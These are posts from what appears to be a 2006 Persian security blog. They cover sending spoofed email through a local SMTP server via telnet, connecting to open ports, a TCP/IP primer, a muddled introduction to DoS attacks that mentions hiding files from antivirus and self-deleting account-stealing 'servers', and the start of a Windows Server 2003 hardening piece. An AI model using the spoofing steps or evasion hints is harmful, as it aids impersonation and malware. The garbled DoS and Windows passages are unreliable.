رفتن برخي از اطلاعات وي شود جرو است و از طريق مراجع ذيصلاح قابل پيگرد قانوني مي باشد. فرستادن ايميل طوري که به نظر برسد از آدرسي ديگر آمده است، اگر آن آدرس ديگر متعلق به شما نباشد علاوه بر غير اخلاقي بودن عمل، انشاءالله قابل پيگيري قانوني مي باشد. از توضيح نصب و کار با SMTP روي ويندوز شخصي منصرف شديم، اما همين قدر بدانيد که از control panel-> add/remove programs بايأ به قسمت add/remove windows components برويد و از آنجا IIS و Message queuing را نصب کنيد و سپس در صورت نياز آنها را تنظيم کنيد. به اين شکل شما قادر به فرستادن ايميل با telnet کردن به آدرس localhost يا آدرس IP 127.0.0.1 به هر آدرسي خواهيد بود. اميدوارم بعد از خواندن اين صفحات به اين نتيجه رسيده باشيد که هرکسي به راحتي مي تواند هر ايميلي را از طرف کس ديگري براي شما ارسال کند و در مورد ايميلهاي مشکوک بايد احتياط کنيد. البته مشکلات ايميل به اينجا ختم نمي شود... ايميل را به طور معمول به کارت پستال بدون پاکت تشبيه مي کنند به اين مفهوم که در مسير رايانه شما به رايانه گيرنده نامه در تمام مسيرهاي مياني و توسط پستچيها قابل خواندن است! اگرچه متاسفانه در ايران به دليل اهميت ندادن به امنيت اطلاعات، تمامي مکالمات تلفني (بخصوص تلفن همراه)، فکس و مانند آنها هم همين حکم را دارند و در مقايسه وضع ايميل کمي بهتر است (بعد بگيد چرا تجارت الکترونيکي نداريم... يا بگيد چرا بانکها خودشون برا خودشون شبکه راه مي اندازند يا...)! سوال :جگونه مي شود به يک پورت باز telnet کرد؟ پاسخ:براي اينکه عملکرد يک پورت براي شما روشن شود، بايد به آن پورت Telnet کنيد.البته معمولا تعدادي از پورتهايي را که ممکن است اطلاعاتي مهم را در اختيار هکرها قرار دهند مثل پورت ۷۹ يا ۸۰ معمولا بسته است و ارتباط با آنها شايد برقرار نشود. براي telnet کردن در command prompt دستور زير را تايپ کنيد: telnet hostname portnum در اين دستور بهجاي hostname شماره ip و يا نام سايت را وارد ميکنيد و بهجاي portnum شماره پورت توجه کنيد که فقط در صورتي ميتوانيد با يک پورت تلنت کنيد که ان پورت open باشد . مثلا براي تلنت کردن به پورت ۱۳ که ساعت و تاريخ را بهدست ميدهد در کامپيوتري با IP : ۱۹۲.۱۶۸.۱۰۰.۳۵ مينويسيد: telnet 192.168.100.35 13 يا اگر ip سايت مورد نظر رو بلد نبوديد (بعد روش بدست اوردن ip رو هم ميگم) ميتوانيد از اين راه استفاده کنيد: telnet yahoo.com 13





مفاهيم پروتکل TCP/IP در شبكه

پروتکل TCP/IP TCP/IP ، يکی از مهمترين پروتکل های استفاده شده در شبکه های کامپيوتری است . اينترنت بعنوان بزرگترين شبکه موجود ، از پروتکل فوق بمنظور ارتباط دستگاه های متفاوت استفاده می نمايد. پروتکل ، مجموعه قوانين لازم بمنظور قانونمند نمودن نحوه ارتباطات در شبکه های کامپيوتری است .در مجموعه مقالاتی که ارائه خواهد شد به بررسی اين پروتکل خواهيم پرداخت . در اين بخش مواردی همچون : فرآيند انتقال اطلاعات ، معرفی و تشريح لايه های پروتکل TCP/IP و نحوه استفاده از سوکت برای ايجاد تمايز در ارتباطات ، تشريح می گردد. مقدمه امروزه اکثر شبکه های کامپيوتری بزرگ و اغلب سيستم های عامل موجود از پروتکل TCP/IP ، استفاده و حمايت می نمايند. TCP/IP ، امکانات لازم بمنظور ارتباط سيستم های غيرمشابه را فراهم می آورد. از ويژگی های مهم پروتکل فوق ، می توان به مواردی همچون : قابليت اجراء بر روی محيط های متفاوت ، ضريب اطمينان بالا ،قابليت گسترش و توسعه آن ، اشاره کرد . از پروتکل فوق، بمنظور دستيابی به اينترنت و استفاده از سرويس های متنوع آن نظير وب و يا پست الکترونيکی استفاده می گردد. تنوع پروتکل های موجود در پشته TCP/IP و ارتباط منطقی و سيستماتيک آنها با يکديگر، امکان تحقق ارتباط در شبکه های کامپيوتری را با اهداف متفاوت ، فراهم می نمايد. فرآيند برقراری يک ارتباط ، شامل فعاليت های متعددی نظير : تبديل نام کامپيوتر به آدرس IP معادل ، مشخص نمودن موقعيت کامپيوتر مقصد ، بسته بندی اطلاعات ، آدرس دهی و روتينگ داده ها بمنظور ارسال موفقيت آميز به مقصد مورد نظر ، بوده که توسط مجموعه پروتکل های موجود در پشته TCP/IP انجام می گيرد. معرفی پروتکل TCP/IP TCP/IP ، پروتکلی استاندارد برای ارتباط کامپيوترهای موجود در يک شبکه مبتنی بر ويندوز 2000 است. از پروتکل فوق، بمنظور ارتباط در شبکه های بزرگ استفاده می گردد. برقراری ارتباط از طريق پروتکل های متعددی که در چهارلايه مجزا سازماندهی شده اند ، ميسر می گردد. هر يک از پروتکل های موجود در پشته TCP/IP ، دارای وظيفه ای خاص در اين زمينه ( برقراری ارتباط) می باشند . در زمان ايجاد يک ارتباط ، ممکن است در يک لحظه تعداد زيادی از برنامه ها ، با يکديگر ارتباط برقرار نمايند. TCP/IP ، دارای قابليت تفکيک و تمايز يک برنامه موجود بر روی يک کامپيوتر با ساير برنامه ها بوده و پس از دريافت داده ها از يک برنامه ، آنها را برای برنامه متناظر موجود بر روی کامپيوتر ديگر ارسال می نمايد. نحوه ارسال داده توسط پروتکل TCP/IP از محلی به محل ديگر ، با فرآيند ارسال يک نامه از شهری به شهر، قابل مقايسه است . برقراری ارتباط مبتنی بر TCP/IP ، با فعال شدن يک برنامه بر روی کامپيوتر مبدا آغاز می گردد . برنامه فوق ،داده های مورد نظر جهت ارسال را بگونه ای آماده و فرمت می نمايد که برای کامپيوتر مقصد قابل خواندن و استفاده باشند. ( مشابه نوشتن نامه با زبانی که دريافت کننده ، قادر به مطالعه آن باشد) . در ادامه آدرس کامپيوتر مقصد ، به داده های مربوطه اضافه می گردد ( مشابه آدرس گيرنده که بر روی يک نامه مشخص می گردد) . پس از انجام عمليات فوق ، داده بهمراه اطلاعات اضافی ( درخواستی برای تائيد دريافت در مقصد ) ، در طول شبکه بحرکت درآمده تا به مقصد مورد نظر برسد. عمليات فوق ، ارتباطی به محيط انتقال شبکه بمنظور انتقال اطلاعات نداشته ، و تحقق عمليات فوق با رويکردی مستقل نسبت به محيط انتقال ، انجام خواهد شد . لايه های پروتکل TCP/IP TCP/IP ، فرآيندهای لازم بمنظور برقراری ارتباط را سازماندهی و در اين راستا از پروتکل های متعددی در پشته TCP/IP استفاده می گردد. بمنظور افزايش کارآئی در تحقق فرآيند های مورد نظر، پروتکل ها در لايه های متفاوتی، سازماندهی شده اند . اطلاعات مربوط به آدرس دهی در انتها قرار گرفته و بدين ترتيب کامپيوترهای موجود در شبکه قادر به بررسی آن با سرعت مطلوب خواهند بود. در اين راستا، صرفا" کامپيوتری که بعنوان کامپيوتر مقصد معرفی شده است ، امکان باز نمودن بسته اطلاعاتی و انجام پردازش های لازم بر روی آن را دارا خواهد بود. TCP/IP ، از يک مدل ارتباطی چهار لايه بمنظور ارسال اطلاعات از محلی به محل ديگر استفاده می نمايد: Application ,Transport ,Internet و Network Interface ، لايه های موجود در پروتکل TCP/IP می باشند.هر يک از پروتکل های وابسته به پشته TCP/IP ، با توجه به رسالت خود ، در يکی از لايه های فوق، قرار می گيرند. لايه Application لايه Application ، بالاترين لايه در پشته TCP/IP است .تمامی برنامه و ابزارهای کاربردی در اين لايه ، با استفاده از لايه فوق، قادر به دستتيابی به شبکه خواهند بود. پروتکل های موجود در اين لايه بمنظور فرمت دهی و مبادله اطلاعات کاربران استفاده می گردند . HTTP و FTP دو نمونه از پروتکل ها ی موجود در اين لايه می باشند . پروتکل HTTP)Hypertext Transfer Protocol) . از پروتکل فوق ، بمنظور ارسال فايل های صفحات وب مربوط به وب ، استفاده می گردد . پروتکل FTP)File Transfer Protocol) . از پروتکل فوق برای ارسال و دريافت فايل، استفاده می گردد . لايه Transport لايه " حمل " ، قابليت ايجاد نظم و ترتيب و تضمين ارتباط بين کامپيوترها و ارسال داده به لايه Application ( لايه بالای خود) و يا لايه اينترنت ( لايه پايين خود) را بر عهده دارد. لايه فوق ، همچنين مشخصه منحصربفردی از برنامه ای که داده را عرضه نموده است ، مشخص می نمايد. اين لايه دارای دو پروتکل اساسی است که نحوه توزيع داده را کنترل می نمايند. TCP)Transmission Control Protocol) . پروتکل فوق ، مسئول تضمين صحت توزيع اطلاعات است . UDP)User Datagram Protocol) . پروتکل فوق ، امکان عرضه سريع اطلاعات بدون پذيرفتن مسئوليتی در رابطه با تضمين صحت توزيع اطلاعات را برعهده دارد . لايه اينترنت لايه "اينترنت"، مسئول آدرس دهی ، بسته بندی و روتينگ داده ها ، است. لايه فوق ، شامل چهار پروتکل اساسی است : IP)Internet Protocol) . پروتکل فوق ، مسئول آدرسی داده ها بمنظور ارسال به مقصد مورد نظر است . ARP)Address Resoulation Protocol) . پروتکل فوق ، مسئول مشخص نمودن آدرس MAC)Media Access Control) آداپتور شبکه بر روی کامپيوتر مقصد است. ICMP)Internet Control Message Protocol) . پروتکل فوق ، مسئول ارائه توابع عيب يابی و گزارش خطاء در صورت عدم توزيع صحيح اطلاعات است . IGMP)Internet Group Managemant Protocol) . پروتکل فوق ، مسئول مديريت Multicasting در TCP/IP را برعهده دارد. لايه Network Interface لايه " اينترفيس شبکه " ، مسئول استقرار داده بر روی محيط انتقال شبکه و دريافت داده از محيط انتقال شبکه است . لايه فوق ، شامل دستگاه های فيزيکی نظير کابل شبکه و آداپتورهای شبکه است . کارت شبکه ( آداپتور) دارای يک عدد دوازده رقمی مبنای شانزده ( نظير : B5-50-04-22-D4-66 ) بوده که آدرس MAC ، ناميده می شود. لايه " اينترفيس شبکه " ، شامل پروتکل های مبتنی بر نرم افزار مشابه لايه های قبل ، نمی باشد. پروتکل های Ethernet و ATM)Asynchronous Transfer Mode) ، نمونه هائی از پروتکل های موجود در اين لايه می باشند . پروتکل های فوق ، نحوه ارسال داده در شبکه را مشخص می نمايند. مشخص نمودن برنامه ها در شبکه های کامپيوتری ، برنامه ها ی متعددی در يک زمان با يکديگر مرتبط می گردند. زمانيکه چندين برنامه بر روی يک کامپيوتر فعال می گردند ، TCP/IP ، می بايست از روشی بمنظور تمايز يک برنامه از برنامه ديگر، استفاده نمايد. بدين منظور ، از يک سوکت ( Socket) بمنظور مشخص نمودن يک برنامه خاص ، استفاده می گردد. آدرس IP برقراری ارتباط در يک شبکه ، مستلزم مشخص شدن آدرس کامپيوترهای مبداء و مقصد است ( شرط اوليه بمنظور برقراری ارتباط بين دو نقطه ، مشخص بودن آدرس نقاط درگير در ارتباط است ) . آدرس هر يک از دستگاه های درگير در فرآيند ارتباط ، توسط يک عدد منحصربفرد که IP ناميده می شود ، مشخص می گردند. آدرس فوق به هريک از کامپيوترهای موجود در شبکه نسبت داده می شود . IP : 10. 10.1.1 ، نمونه ای در اين زمينه است . پورت TCP/UDP پورت مشخصه ای برای يک برنامه و در يک کامپيوتر خاص است .پورت با يکی از پروتکل های لايه "حمل" ( TCP و يا UDP ) مرتبط و پورت TCP و يا پورت UDP ، ناميده می شود. پورت می تواند عددی بين صفر تا 65535 را شامل شود. پورت ها برای برنامه های TCP/IP سمت سرويس دهنده ، بعنوان پورت های "شناخته شده " ناميده شده و به اعداد کمتر از 1024 ختم و رزو می شوند تا هيچگونه تعارض و برخوردی با ساير برنامه ها بوجود نيايد. مثلا" برنامه سرويس دهنده FTP از پورت TCP بيست و يا بيست ويک استفاده می نمايد. سوکت (Socket) سوکت ، ترکيبی از يک آدرس IP و پورت TCP ويا پورت UDP است . يک برنامه ، سوکتی را با مشخص نمودن آدرس IP مربوط به کامپيوتر و نوع سرويس ( TCP برای تضمين توزيع اطلاعات و يا UDP) و پورتی که نشاندهنده برنامه است، مشخص می نمايد. آدرس IP موجود در سوکت ، امکان آدرس دهی کامپيوتر مقصد را فراهم و پورت مربوطه ، برنامه ای را که داده ها برای آن ارسال می گردد را مشخص می نمايد. در بخش دوم اين مقاله به تشريح هر يک از پروتکل های موجود در پشته TCP/IP، خواهيم پرداخت . TCP/IP ،شامل شش پروتکل اساسی( TCP,UDP,IP,ICMP,IGMP ،ARP ) و مجموعه ای از برنامه های کاربردی است. پروتکل های فوق، مجموعه ای از استادنداردها ی لازم بمنظور ارتباط بين کامپيوترها و دستگاهها را در شبکه ، فراهم می نمايد. تمامی برنامه ها و ساير پروتکل ها ی موجود در پروتکل TCP/IP ، به پروتکل های شش گانه فوق مرتبط و از خدمات ارائه شده توسط آنان استفاده می نمايند . در ادامه به تشريح عملکرد و جايگاه هر يک از پروتکل های اشاره شده ، خواهيم پرداخت . پروتکل TCP : لايه Transport TCP) Transmission Control Protocol) ، يکی از پروتکل های استاندارد TCP/IP است که امکان توزيع و عرضه اطلاعات ( سرويس ها) بين صرفا" دو کامپيوتر ، با ضريب اعتماد بالا را فراهم می نمايد. چنين ارتباطی ( صرفا" بين دو نقطه ) ، Unicast ناميده می شود . در ارتباطات با رويکرد اتصال گرا ، می بايست قبل از ارسال داده ، ارتباط بين دو کامپيوتر برقرار گردد . پس از برقراری ارتباط ، امکان ارسال اطلاعات برای صرفا" اتصال ايجاد شده ، فراهم می گردد . ارتباطات از اين نوع ، بسيار مطمئن می باشند ، علت اين امر به تضمين توزيع اطلاعات برای مقصد مورد نظر برمی گردد . بر روی کامپيوتر مبداء ، TCP داده هائی که می بايست ارسال گردند را در بسته های اطلاعاتی (Packet) سازماندهی می نمايد. در کامپيوتر مقصد ، TCP ، بسته های اطلاعاتی را تشخيص و داده های اوليه را مجددا" ايجاد خواهد کرد . ارسال اطلاعات با استفاده از TCP TCP ، بمنظور افزايش کارائی ، بسته های اطلاعاتی را بصورت گروهی ارسال می نمايد . TCP ، يک عدد سريال ( موقعيت يک بسته اطلاعاتی نسبت به تمام بسته اطلاعاتی ارسالی ) را به هريک از بسته ها نسبت داده و از Acknowledgment بمنظور اطمينان از دريافت گروهی از بسته های اطلاعاتی ارسال شده ، استفاده می نمايد. در صورتيکه کامپيوتر مقصد ، در مدت زمان مشخصی نسبت به اعلام وصول بسته های اطلاعاتی ، اقدام ننمايد ، کامپيوتر مبداء ، مجددا" اقدام به ارسال اطلاعات می نمايد. علاوه برافزودن يک دنباله عددی و Acknowledgment به يک بسته اطلاعاتی ، TCP اطلاعات مربوط به پورت مرتبط با برنامه ها ی مبداء و مقصد را نيز به بسته اطلاعاتی اضافه می نمايد. کامپيوتر مبداء ، از پورت کامپيوتر مقصد بمنظور هدايت صحيح بسته های اطلاعاتی به برنامه مناسب بر روی کامپيوتر مقصد ، استفاده می نمايد. کامپيوتر مقصد از پورت کامپيوتر مبداء بمنظور برگرداندن اطلاعات به برنامه ارسال کننده در کامپيوتر مبداء ، استفاده خواهد کرد . هر يک از کامپيوترهائی که تمايل به استفاده از پروتکل TCP بمنظور ارسال اطلاعات دارند ، می بايست قبل از مبادله اطلاعات ، يک اتصال بين خود ايجاد نمايند . اتصال فوق ، از نوع مجازی بوده و Session ناميده می شود .دو کامپيوتر درگير در ارتباط ، با استفاده از TCP و بکمک فرآيندی با نام : Three-Way handshake ، با يکديگر مرتبط و هر يک پايبند به رعايت اصول مشخص شده در الگوريتم مربوطه خواهند بود . فرآيند فوق ، در سه مرحله صورت می پذيرد : مرحله اول : کامپيوتر مبداء ، اتصال مربوطه را از طريق ارسال اطلاعات مربوط به Session ، مقداردهی اوليه می نمايد ( عدد مربوط به موقعيت يک بسته اطلاعاتی بين تمام بسته های اطلاعاتی و اندازه مربوط به بسته اطلاعاتی ) مرحله دوم : کامپيوتر مقصد ، به اطلاعات Session ارسال شده ، پاسخ مناسب را خواهد داد . کامپيوتر مبداء ، از شرح واقعه بکمک Acknowledgment ارسال شده توسط کامپيوتر مقصد ، آگاهی پيدا خواهد کرد . پروتکل UDP : لايه Transport UDP) User Datagram Protocol ) ، پروتکلی در سطح لايه "حمل" بوده که برنامه مقصد در شبکه را مشخص نموده و از نوع بدون اتصال است . پروتکل فوق، امکان توزيع اطلاعات با سرعت مناسب را ارائه ولی در رابطه با تضمين صحت ارسال اطلاعات ، سطح مطلوبی از اطمينان را بوجود نمی آورد . UDP در رابطه با داده های دريافتی توسط مقصد ، به Acknowledgment نيازی نداشته و در صورت بروز اشکال و يا خرابی در داده های ارسال شده ، تلاش مضاعفی بمنظور ارسال مجدد داده ها ، انجام نخواهد شد . اين بدان معنی است که داده هائی کمتر ارسال می گردد ولی هيچيک از داده های دريافتی و صحت تسلسل بسته های اطلاعاتی ، تضمين نمی گردد .از پروتکل فوق ، بمنظور انتقال اطلاعات به چندين کامپيوتر با استفاده از Broadcast و يا Multicast ، استفاده بعمل می آيد . پروتکل UDP ، در موارديکه حجم اندکی از اطلاعات ارسال و يا اطلاعات دارای اهميت بالائی نمی بانشد ، نيز استفاده می گردد. استفاده از پروتکل UDP در مواردی همچون Multicasting Streaming media ، (نظير يک ويدئو کنفرانس زنده) و يا انتشار ليستی از اسامی کامپيوترها که بمنظور ارتباطات محلی استفاده می گردند ، متداول است . بمنظور استفاده از UDP ، برنامه مبداء می بايست پورت UDP خود را مشخص نمايد دقيقا" مشابه عملياتی که می بايست کامپيوتر مقصد انجام دهد . لازم به يادآوری است که پورت های UDP از پورت های TCP مجزا و متمايز می باشند (حتی اگر دارای شماره پورت يکسان باشند ). پروتکل IP : لايه Internet IP) Internet Protocol ) ، امکان مشخص نمودن محل کامپيوتر مقصد در يک شبکه ارتباطی را فراهم می نمايد. IP ، يک پروتکل بدون اتصال و غيرمطمئن بوده که اولين مسئوليت آن آدرس دهی بسته های اطلاعاتی و روتينگ بين کامپيوترهای موجود در شبکه است . با اينکه IP همواره سعی در توزيع يک بسته اطلاعاتی می نمايد ، ممکن است يک بسته اطلاعاتی در زمان ارسال گرفتار مسائل متعددی نظير : گم شدن ، خرابی ، عدم توزيع با اولويت مناسب ، تکرار در ارسال و يا تاخير، گردند.در چنين مواردی ، پروتکل IP تلاشی بمنظور حل مشکلات فوق را انجام نخواهد داد ( ارسال مجدد اطلاعات درخواستی ) .آگاهی از وصول بسته اطلاعاتی در مقصد و بازيافت بسته های اطلاعاتی گم شده ، مسئوليتی است که بر عهده يک لايه بالاتر نظير TCP و يا برنامه ارسال کننده اطلاعات ، واگذار می گردد . عمليات انجام شده توسط IP می توان IP را بعنوان مکانی در نظر گرفت که عمليات مرتب سازی و توزيع بسته های اطلاعاتی در آن محل ، صورت می پذيرد .بسته ها ی اطلاعاتی توسط يکی از پروتکل های لايه حمل ( TCP و يا UDP) و يا از طريق لايه " ايترفيس شبکه " ، برای IP ارسال می گردند . اولين وظيفه IP ، روتينگ بسته های اطلاعاتی بمنظور ارسال به مقصد نهائی است . هر بسته اطلاعاتی ، شامل آدرس IP مبداء ( فرستنده ) و آدرس IP مقصد ( گيرنده ) می باشد. در صورتيکه IP ، آدرس مقصدی را مشخص نمايد که در همان سگمنت موجود باشد ، بسته اطلاعاتی مستقيما" برای کامپيوتر مورد نظر ارسال می گردد . در صورتيکه آدرس مقصد در همان سگمنت نباشد ، IP ، می بايست از يک روتر استفاده و اطلاعات را برای آن ارسال نمايد.يکی ديگر از وظايف IP ، ايجاد اطمينان از عدم وجود يک بسته اطلاعاتی ( بلاتکليف ! ) در شبکه است . بدين منظور محدوديت زمانی خاصی در رابطه با مدت زمان حرکت بسته اطلاعاتی در طول شبکه ، در نظر گرفته می شود .عمليات فوق، توسط نسبت دادن يک مقدار TTL)Time To Live) به هر يک از بسته های اطلاعاتی صورت می پذيرد. TTL ، حداکثر مدت زمانی را که بسته اطلاعاتی قادر به حرکت در طول شبکه است را مشخص می نمايد( قبل از اينکه بسته اطلاعاتی کنار گذاشته شود) . پروتکل ICMP : لايه Internet ICMP) Internet Control Message Protocol) ، امکانات لازم در خصوص اشکال زدائی و گزارش خطاء در رابطه با بسته های اطلاعاتی غيرقابل توزيع را فراهم می نمايد. با استفاده از ICMP ، کامپيوترها و روترها که از IP بمنظور ارتباطات استفاده می نمايند ، قادر به گزارش خطاء و مبادله اطلاعاتی محدود در رابطه وضعيت بوجود آمده می باشند. مثلا" در صورتيکه IP ، قادر به توزيع يک بسته اطلاعاتی به مقصد مورد نظر نباشد ، ICMP يک پيام مبتنی بر غيرقابل دسترس بودن را برای کامپيوتر مبداء ارسال می دارد . با اينکه پروتکل IP بمنظور انتقال داده بين روترهای متعدد استفاده می گردد ، ولی ICMP به نمايندگی از TCP/IP ، مسئول ارائه گزارش خطاء و يا پيام های کنترلی است . تلاش ICMP ، در اين جهت نيست که پروتکل IP را بعنوان يک پروتکل مطمئن مطرح نمايد ، چون پيام های ICMP دارای هيچگونه محتوياتی مبنی بر اعلام وصول پيام (Acknowledgment ) بسته اطلاعاتی نمی باشند . ICMP ، صرفا" سعی در گزارش خطاء و ارائه فيدبک های لازم در رابطه با تحقق يک وضعيت خاص را می نمايد . پروتکل IGMP : لايه Internet IGMP) Internet Group Managment Protocol) ، پروتکلی است که مديريت ليست اعضاء برای IP Multicasting ، در يک شبکه TCP/IP را بر عهده دارد . IP Multicasting، فرآيندی است که بر اساس آن يک پيام برای گروهی انتخاب شده از گيرندگان که گروه multicat ناميده می شوند ؛ ارسال می گردد . IGMP ليست اعضاء را نگهداری می نمايد . پروتکل ARP : لايه Internet ARP) Address Resolution Protocol) ، پروتکلی است که مسئوليت مسئله " نام به آدرس" را در رابطه با بسته های اطلاعاتی خروجی (Outgoing) ، برعهده دارد . ماحصل فرآيند فوق ، Mapping آدرس IP به آدرسMAC )Media Access Control) ، مربوطه است . کارت شبکه از آدرس MAC ، بمنظور تشخيص تعلق يک بسته اطلاعاتی به کامپيوتر مربوطه ، استفاده می نمايند . بدون آدرس های MAC ، کارت های شبکه ، دانش لازم در خصوص ارسال بسته های اطلاعاتی به لايه بالاتر بمنظور پردازش های مربوطه را دارا نخواهند بود . همزمان با رسيدن بسته های اطلاعاتی به لايه IP بمنظور ارسال در شبکه ، آدرس های MAC مبداء و مقصد به آن اضافه می گردد . ARP ، از جدولی خاص بمنظور ذخيره سازی آدرس های IP و MAC مربوطه ، استفاده می نمايد. محلی از حافظه که جدول فوق در آنجا ذخيره می گردد ، ARP Cache ناميده می شود. ARP Cache هر کامپيوتر شامل mapping لازم برای کامپيوترها و روترهائی است که صرفا" بر روی يک سگمنت مشابه قرار دارند.
+ نوشته شده در  دوشنبه سی ام مرداد 1385ساعت 10:20  توسط Reza  | 

Dos Part:1

تمام حقوق مادی و معنوی برای نویسنده محفوظ است.و هر گونه کپی برداری از مطالب و محتوای این وبلاگ بدون ذکر نام وبلاگ به هر نحوی غیر مجاز است.ودوستان عزیز نیز میتوانید سوال های خودتان را در قسمت نظر اعلام کند. و یا می توانند مقالات خود را در مورد هک و (Information Technology) را به من فرصتاده و با نام نویسنده در وبلاگ به عرضه ی دید دوستداران قرار گیرد. ودوستان شرمنده نظر یادتون نره.دوستدار شما رضا

مقدمه:

تاکنون شاید شنیده باشید که وبسایتی مورد تهاجمی از نوع Dos قرار رفته و حال من می خواهم نوع حملات در Dos و مقابله با آن را به شما آموزش دهم و شما را درمورد حملات و مقابله با هر چند که اندک هم باشد یاری دهم. ولی دوستان شرمنده که حرف و قطع کردم نظر یادتون نره.

یکی از بر طرف سازی نیازها در نظر گرفت سه جز اصلی میباشد.

1:مکانیزم امنیتی.

مکانیزمی که بررسی رفع حملات وجلو گیری از از دست رفتن اطلاعات را در سیستم جلوگیری می کند .

2:حملات امنیتی:

هر نوع حمله ای که به نوعی باعث از بین رفتن اطلاعات در یک سرور و یا تغییر آن را به طور ناگهانی را میتوان گفت برای مثل سرور های ناسا که توسط گروه امنیتی آشیانه هک وصحفه اول آن مورد تغییر قرار داده شده بود.

3:سروسهای امنیتی: هر نوع سرویسی که به نوعی عامل بروز حملاتی از جمله حمله ها Dos و حملات مشابه به ان گر دد. را سرویسهای امنیتی می باشند. که میتوان برای مثال فایر والهای نرمافزاری وفایروالهی سخت افزاری را نام برد که در شرکتهای سرمایه دار به کار می رود معمولا بسیار گران میباشند. برای ما.

وقفه در عمل:زمانیکه سیستم از بین می رود یا بهتره که بگیم قسمتی از سیستم که برای مثال روتر های سیسکو برای ریست شدن باید یک پسورد بسیار طولانی بااعداد بزرگ نوشته شود تا سیستم ریستارت گردد.یا که از بین بردن فایل مدیریت سیستم که کار نه چندان سادهای نیست .که به وسیله آن میشود به سیستم وارد شد ویک شل shell  از ان گرفت. که بعد متوانید مسیر یابی کرده وشلوغی کنید.

بریدگی: دسترسی غیر مجاز به اطلاعات یک سیستم توسط یک سیستم یک فرد و... که متوان در ان از کپی رایت غیر مجاز یک فایل یا اطلاعاتی در مورد زمینه ای می توان اطلاعاتی به دست آورد. برای مثال فردی که توانسته بود اطلاعاتی که درمود سورس های ویندوز که به نظرم متعلق به کشور فرانسه بود را پیدا کند. که بعد از ان به گیر مامورین دستگیر شد.

دستکاری: دسترسی غیر مجاز به اطلاعات سیستم و تغییر نوع عملکردی که در ان سیستم اصلی قبلا در حال انجام بوده .

تقلید از سیستم: تقلید از سیستم به نوعی که با وارد کردن فایلها پیامها و... باعث Down شدن سیستم میگردد.

مباحثی که  گفته شد مربوط به نوع حملات مربوط می شد. حال میخواهیم در مورد چگونگی حملات با هم به گفتگو بپردازیم. که حملات به صورت افلاین یا به صورت انلاین انجام میگیرد.یا به نوعی فعال یا غیر فعالیا نیمه فعال.

حملات کامپیوتری همان طور که گفته شد معمولا زیاد میباشند و زیر مجموعه یا ریشه ی همی انها از دو جز زریر تشکیل شده است.

حمله های غیر فعال:که معمولا برای به دست اوردن اطلاعاتی میباشد که وارد سیستم گردیده که میتوان انها رو به دو دسته اشکار سازی محتوای پیام یا همان دیتا و انالایز ترفیک شبکه یا نتورک

1:اشکارسازی محتوای پیام یا دیتا: اشکار سازی هم به دو نوع انجام میگیرد که هرنوع عمل مخصوص به خود را در بر میگیرد. قبل از فرصتادن فایل و بعد ازفرصتادن فایل که وقت نمایش یا اشکار شدن میباشد.برای مثال یک فایلی داریم که میخواهیم ان را برای فردی میفرستیم که او هم یک فایر وال دارد ما باید ان را از دید انتی ویروس گم کنیم تا نتواند او را ببیند.

2:انالایز سیستم:حال در اشکار سازی به صورت مخفی که در بالا اعلام شد.زمانی که اطلاعات را به فرد فرصتادیم زمانی که فرد فایل را پیدا کرد نتواند اطلاعاتی را که در فایل که روش انجام کار همانند الگوریتم قرار دارد . را پیدا کرده مابایید در این روش روش گم کردن اطلاعات را متغییر کنیم یا زمانی که فایل لشکار شد خود به خود از بین برود.که معمولا سرور هایی که دوستان به یکدیگر برای هک کردن یاهو به یکدیگر میفرستند . زمانی که برروی فایل کلیک میشود فایل خود به خود خودش را از بین می برد و در سیستم سرسی قرار می دهد یا به قول گفتنی خودش را از بین می برد.

فعال:روش فعال بر خلاف روش غیر فعال باعث می شود که هکر کارهای متواوتی را در عرض چند دقیقه انجام دهد تکرار, تغییر اطلاعات,انکار سرویس,جلوگیری از باز پس گیری,جلوگیری از پیدا شدن ای پی و تغییر ای پی که پشت صر هم انجام دادن این عملیات کار ساده ای نمی باشد.در قسمت بعدی به تکرار, تغییر اطلاعات,انکار سرویس و......... میپردازیم. خوانندگان گرامی خسته نباشید. شرمنده که میگم نظر یادتون نره . برای این که منو امیدوار کنید به وبلاگ نویسی.انشا ال.... در قسمت اخر الگوریتم حملات Dos را برایتان با گرافیک بالا به نوعی که جایی ندیده باشین.دوستدار شما رضا

+ نوشته شده در  چهارشنبه بیست و پنجم مرداد 1385ساعت 18:49  توسط Reza  | 

SECURITY 2003 SERVER

اگر تا به حال از ويندوز سرورNTيندوز سرور 2000استفاده كرده با شيد ، احتمالا متوجه شده ايد كه مايكرو سافت آنها را به صورت پيش فرض، غير ايمن طراحي كرده است . گرچه مايكروسافت و ساز و كارهاي امنيتي متعددي ايجاد كرده است ، اما نصب آنها به عهده كاربران است . اين در حالي است كه وقتي مايكرو سافت ويندوز 2003 را انتشارداد ، با اين كار ، فلسفه جديد اين است كه بايد به صورت پيش فرض ايمن باشد. به باشيد كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانيد آن را به طور كامل پياده كند . با آن كه سرور بايد به طور كامل پياده كند . با آن كه ويندوز 2003 را انتشار داد ، با اين كار ، فلسفه خود را تغيير داد .

فلسفه جديد اين است كه سرور با يد به صورت پيش فرض ايمن باشد. به طور كلي اين ايده بسيار خوبي است ، اما مايكروسافت نتوانست آن را به طور كامل پياده كند . با آن كه ويندوز 2003 بدون شك ايمن تر از ويندوز NTيا ويندوز2000است ، اما هنوز هم نقصاني در آن ديده مي شود . در اينجا ما اعمال ساده اي را كه شما مي توانيد براي ايمن تر كردن ويندوز سرور 2003 انجام دهيد شرح مي دهيم .

نقش خود را بدانيد
شناخت نقش سروردر روند ايمن سازي بسيار حياتي است. نقش هاي متعددي وجود دارد كه ويندوز سرور ممكن است بر عهده داشته با شد .
براي مثال سرور ممكن است بر عهده داشته باشد . براي مثال ويندوز سرور 2003 ميتوانيد در نقش يك كنترل كننده دامنه ( domin Contoller ) ، يك سرور عضو ( member server )، سرور پايه( )سرور فايل ( )، سرور پرينت ( ) ، سرور پايانه ( ) و يا حالت هاي متعدد ديگر عمل كند. يك سرور همچنين مي تواند تركيبي از اين نقش ها را به عهده داشته باشد.
